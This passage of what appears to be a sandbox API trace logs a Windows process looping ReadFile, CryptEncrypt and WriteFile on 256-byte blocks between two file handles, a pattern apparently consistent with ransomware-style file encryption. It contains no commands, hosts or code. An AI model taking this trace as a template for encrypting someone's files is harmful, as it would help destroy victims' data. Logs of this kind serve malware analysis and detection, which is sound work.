lpOverlapped=0x0) returned 1 [0162.245] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.246] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.246] GetLastError () returned 0x0 [0162.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.246] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.246] GetLastError () returned 0x0 [0162.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.246] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.246] GetLastError () returned 0x0 [0162.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.246] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.246] GetLastError () returned 0x0 [0162.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.246] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.246] GetLastError () returned 0x0 [0162.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.246] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.246] GetLastError () returned 0x0 [0162.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.246] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.247] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.247] GetLastError () returned 0x0 [0162.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.247] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.247] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.247] GetLastError () returned 0x0 [0162.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.247] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.247] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.247] GetLastError () returned 0x0 [0162.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.247] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.247] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.247] GetLastError () returned 0x0 [0162.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.247] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.247] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.247] GetLastError () returned 0x0 [0162.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.247] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.247] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.247] GetLastError () returned 0x0 [0162.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.247] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.248] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.248] GetLastError () returned 0x0 [0162.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.248] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.248] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.248] GetLastError () returned 0x0 [0162.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.248] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.248] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.248] GetLastError () returned 0x0 [0162.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.248] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.248] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.248] GetLastError () returned 0x0 [0162.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.248] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.248] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.248] GetLastError () returned 0x0 [0162.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.248] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.249] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.249] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.249] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.249] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.249] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.249] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.249] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.249] GetLastError () returned 0x0 [0162.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.250] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.250] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.250] GetLastError () returned 0x0 [0162.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.250] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.250] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.250] GetLastError () returned 0x0 [0162.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.250] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.250] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.250] GetLastError () returned 0x0 [0162.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.250] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.250] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.250] GetLastError () returned 0x0 [0162.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.250] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.250] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.250] GetLastError () returned 0x0 [0162.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.250] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.250] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.250] GetLastError () returned 0x0 [0162.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.251] GetLastError () returned 0x0 [0162.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 